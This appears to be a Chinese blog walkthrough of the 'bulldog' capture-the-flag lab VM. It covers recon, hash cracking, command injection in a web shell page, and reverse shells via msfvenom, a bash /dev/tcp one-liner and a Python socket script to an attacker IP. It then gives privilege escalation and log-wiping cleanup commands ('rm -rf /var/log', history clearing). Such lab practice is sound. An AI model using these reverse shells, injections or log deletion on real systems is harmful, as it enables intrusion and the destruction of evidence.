zoukankan      html  css  js  c++  java
  • bulldog

    信息收集

    扫描主机存货确定ip

    netdiscover -i wlan0 -r 192.168.0.0/24
    

    查找到ip为192.168.0.105

    然后nmap扫描

    nmap -sC -sV 192.168.0.105
    

    发现80,8080,23的远程连接

    在80端口没有发现重要信息

    目录扫描

    dirb http://192.168.0.105
    

    发现最初的三个目录

    /admin
    /dev
    /robots.txt
    

    查看各种进行

    发现/admin

    尝试弱口令爆破没出来,sql注入,虽然没验证码,但是

    image-20210817220829749

    说明密码的复杂性

    所以换条路

    看robots.txt

    发现图像

    image-20210817220918897

    翻译发现...

    第一个是getman shepherd ,意思是德国牧羊犬

    第二个 hack team...没意思,以为是工具

    啥也不是,从dev下手

    从源码查看,有注释

    image-20210817221247422

    然后cmd5和md5的网站破解两个

    最后两个

    nick@bulldogindustries.com bulldog

    sarah@bulldogindustries.com bulldoglover

    登陆失败,再用光人物名,登录nick成功

    入侵尝试

    额,返回之前的websehll页面,因为已经登陆了,带有cookie性的登陆成功那个页面,发现多条&输入并执行

    然后尝试远程下载python脚本

    image-20210817224559223

    因为这个里面显示了编程语言脚本

    msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.104 LPORT=8800 -f raw > shell.py
    

    然后上传到kali的下

    然后开启apache服务

    然后执行命令

    ls&&wget 192.168.0.104/shell.py
    

    image-20210817224954231

    设置msf的handler监听

    进行相关的payload的配置和ip、端口后

    进行run

    emm

    但发现监听总是成功不了,可能因为msf的生成文件问题,然后就用bash在网上搜的

    ls &&echo "bash -i >& /dev/tcp/192.168.0.104/8800 0>&1" | bash&pwd
    

    这个也邢

    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("192.168.56.102",1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/bash","-i"])
    

    那就用nc

    nc -lvp 8800
    

    image-20210818090836682

    探测

    找用户身份和密码

    cat /etc/passwd

    因为根据之前的网站,找相关的

    bulldog,django

    发现

    bulldogadmin,django

    先进bulldogadmin

    然后ls -alh

    发现

    隐藏文件查看后

    一个提示,一个乱码

    所以使用乱码的不用cat,用string

    string customPermissionAPP
    strings命令用来提取和显示非文本文件中的文本字符串
    

    发现冗余的密码,多了H,去掉

    然后

    找到密码

    启动切换管理身份

    不知道管理身份是谁

    试了很多

    ...

    看了一个大佬的帖子

    发现python调用本地shell

    python -c ‘import pty; pty.spawn("/bin/bash")’
    

    然后ls

    发现flag

    清理

    rm  -rf /var/log
    find / -name history 
    然后定位到history
    然后echo "">history
    然后再histroy -c
    

    这个清理有点上头了,瞎胡写的,后期会再单写一篇,23333
    这一个有点简单了.
    因为kali安装自己电脑当系统了,所以没图片,233
    参考:
    群里的文件

    别人都在不停的努力,自己又怎么会停
  • 相关阅读:
    golang基础--控制语句
    django restful framework 一对多方向更新数据库
    C# 一句很简单而又很经典的代码
    2D图形如何运动模拟出3D效果
    C# 通俗说 委托(和事件)
    C# 定积分求周长&面积原理 代码实现
    Unity 消息发送机制 解析
    Unreal 读书笔记 (二) 类对象的设计
    Unreal 读书笔记 (一) 五个常见基类
    Unreal TEXT FText,FName,FString 浅谈
  • 原文地址:https://www.cnblogs.com/chenyouxiu/p/15155611.html
Copyright © 2011-2022 走看看